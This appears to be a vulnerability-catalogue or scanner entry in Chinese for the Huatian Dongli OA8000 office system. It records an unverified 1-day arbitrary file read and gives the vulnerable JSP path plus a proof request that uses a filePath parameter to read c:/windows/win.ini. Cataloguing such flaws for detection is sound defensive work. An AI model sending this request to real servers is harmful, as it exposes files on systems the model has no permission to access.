vendor = "华天动力"
name = "华天动力oa8000存在任意文件读取"
type = "权限绕过"
version = "未知"
path = "/OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp"
detail = "/OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini"
fix = "缺省规则可检出"
date = "0702"
label = "1day"
verifier = "未验真"
